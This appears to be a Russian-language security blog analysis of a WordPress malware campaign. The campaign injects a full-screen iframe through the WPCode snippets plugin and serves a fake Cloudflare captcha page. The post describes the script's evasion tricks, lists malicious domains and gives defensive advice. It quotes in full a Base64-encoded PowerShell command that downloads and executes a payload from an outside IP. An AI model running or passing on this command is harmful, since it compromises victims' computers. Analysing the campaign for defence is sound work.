Злонамеренный JavaScript вставляет полноэкранный iframe на

Home Злонамеренный JavaScript вставляет полноэкранный iframe на

Узнайте, как злонамеренный JavaScript вставляет полноэкранные iframe на сайты WordPress, создавая угрозы безопасности. Изучите индикаторы, анализ и стратегии защиты.

Злонамеренный JavaScript вставляет полноэкранный iframe на сайты WordPress: анализ безопасности

В рамках недавних расследований безопасности выявлена стойкая вредоносная кампания на базе JavaScript, нацеленная на сайты WordPress. Этот злонамеренный скрипт вставляет полноэкранный iframe, который втайне загружает и вынуждает пользователей взаимодействовать с нежелательным контентом с подозрительных внешних доменов. Такие атаки часто служат целям, таким как мошенничество с рекламой, генерация фальшивого трафика или социальная инженерия.

Понимание угрозы: что было выявлено?

Основное вредоносное поведение связано с агрессивным внедрением полноэкранного iframe, загружаемого с сомнительных доменов. Этот iframe появляется без согласия, полностью накрывая веб-страницу, тем самым ограничивая любую легитимную пользовательскую активность.

Ключевые характеристики вредоносного ПО включают:

  • Использование продвинутых методов уклонения, таких как антиотладочные процедуры, которые замедляют анализ при обнаружении отладочных инструментов.
  • Перехват функций браузера, таких как методы консоли, для подавления логов и затруднения обнаружения.
  • Постоянное выполнение полезной нагрузки за счёт злоупотребления localStorage для контроля частоты отображения iframe.
  • Избирательное нацеливание на основе строк user-agent, преимущественно на пользователей Windows с популярными браузерами Chrome, Firefox, Edge и Opera.

Индикаторы компрометации в WordPress

Вредоносное ПО было обнаружено, встроенным в базу данных WordPress, конкретно в таблице wp_options в записи option_name=wpcode_snippets. Это расположение важно, поскольку оно соответствует плагину WPCode, часто используемому для безопасного выполнения пользовательских фрагментов кода без изменения файлов темы.

К сожалению, злоумышленники используют возможность этого плагина выполнять произвольный код, тайно внедряя вредоносные скрипты через административный интерфейс WordPress.

Задействованные вредоносные домены

Iframe загружает контент с следующих подозрительных доменов, которые были помечены и внесены в черные списки многими поставщиками безопасности:

  • capcloud.icu — широко известен размещением вводящего в заблуждение контента, например, фальшивых капч.
  • wallpaper-engine.pro — связан с распространением вредоносного ПО и мошеннической деятельностью.
  • Дополнительные домены, связанные с тем же IP-хостингом, включают: wanderclean.com, ampunshifu.org, cdnstat.net, adoodlz.com, secretdinosaurcult.com и weathersnoop.com.

Данные домены были подтверждены аналитическими инструментами, такими как Sucuri SiteCheck и VirusTotal, которые зафиксировали множественные обнаружения для каждого.

Глубокий анализ вредоносного ПО

Антиотладка и техники обфускации

Вредоносный скрипт запускается с помощью самовызывающейся функции, использующей различные антиотладочные техники, такие как бесконечные циклы и неправильное использование JavaScript-конструкторов. Эти приёмы предназначены для препятствия обратному проектированию путём замораживания выполнения при активных отладочных средствах.

Кроме того, скрипт переопределяет встроенные методы вывода в консоли браузера (например, console.log, console.warn), обнуляя их вывод, что эффективно скрывает подозрительную активность при инспекции.

Фильтрация User-Agent для целевых атак

Полезная нагрузка проверяет user-agent посетителя для селективного внедрения iframe на устройствах Windows, использующих популярные браузеры. Такая точность повышает успешность атаки и снижает вероятность обнаружения, избегая нецелевых платформ и ботов.

Контролируемое внедрение полноэкранного iframe

Механизм внедрения iframe предусматривает лимиты количества показов с помощью localStorage. Вредоносный iframe появляется максимум три раза и автоматически исчезает примерно через четыре минуты, симулируя безобидный пользовательский опыт и обманывая посетителей, заставляя их думать, что произошло легитимное действие (например, загрузка).

Фальшивая верификация Cloudflare и полезная нагрузка PowerShell

Одним из самых обманчивых элементов является поддельная страница Cloudflare «Подтвердите, что вы человек», подаваемая с capcloud.icu/captcha.html. Эта подделка имитирует legítимную защиту Cloudflare от DDoS, но вместо этого предлагает пользователям выполнить замаскированную команду PowerShell на их компьютерах.

Предоставленная команда использует Base64-кодирование для загрузки и тихого выполнения вредоносного скрипта, приводя к удаленной доставке полезной нагрузки и возможному компрометированию системы:

cmd.exe /c "start /min powershell -nop -ep Bypass -eC aQB3AHIAIAAiAGgAdAB0AHAAOgAvAC8AMQA4ADAALgAxADcAOAAuADEAOAA5AC4ANwAvAG0AeQBjAGEAcAB0AGMAaABhAC4AaAB0AG0AbAAiACAAfAAgAGkAZQB4AA=="

После декодирования команда загружает файл с http://180.178.189.7/mycaptcha.html, который может содержать дальнейшие вредоносные скрипты или инструкции.

Последствия и риски

Данная кампания с полноэкранным iframe несет несколько серьезных рисков:

  • Влияние на опыт посетителей: Навязчивый iframe нарушает легитимное взаимодействие, подрывая доверие пользователей и репутацию сайта.
  • Угрозы безопасности: Пользователей обманывают и заставляют запускать вредоносные команды PowerShell, что может привести к полному компрометированию системы.
  • Репутационные и SEO потери: Затронутые сайты рискуют быть внесены в черные списки сервисов безопасности, что ухудшает позиции в поисковых системах и снижает трафик.

Лучшие практики по защите и устранению

Владельцам сайтов следует применять строгие меры безопасности для защиты и восстановления после подобных инфекций:

  1. Поддерживайте ядро, плагины и темы WordPress в актуальном состоянии: Регулярные обновления закрывают уязвимости, часто используемые злоумышленниками.
  2. Проверяйте и усиливайте использование плагинов: Отключайте или удаляйте плагины, позволяющие выполнять произвольный код, особенно те, которые дают возможность внедрения кода на уровне администратора, например WPCode snippets.
  3. Используйте веб-фаерволы приложений (WAF): Они способны обнаруживать и блокировать вредоносные JavaScript-инъекции и несанкционированные изменения базы данных.
  4. Включите мониторинг целостности файлов и базы данных: Активируйте автоматические уведомления о любых несанкционированных изменениях критичных файлов или записей базы данных.
  5. Реализуйте строгий контроль доступа: Используйте сложные пароли, ограничивайте количество администраторов и отключайте редактирование файлов через панель WordPress.
  6. Регулярно сканируйте систему на наличие вредоносного ПО: Применяйте надежные сканеры для раннего обнаружения заражений.

Заключение

Эта кампания вредоносного ПО демонстрирует, как злоумышленники эксплуатируют легитимные плагины WordPress и механизмы хранения для проведения сложных атак на основе JavaScript. Внедряя полноэкранные iframe с вредоносных доменов и обманывая посетителей поддельными страницами проверки, эта угроза ставит под угрозу безопасность сайтов и пользователей.

Соблюдение наилучших практик безопасности и использование надежных средств мониторинга остаются ключевыми для владельцев сайтов WordPress, стремящихся эффективно снижать эти риски.

Ссылки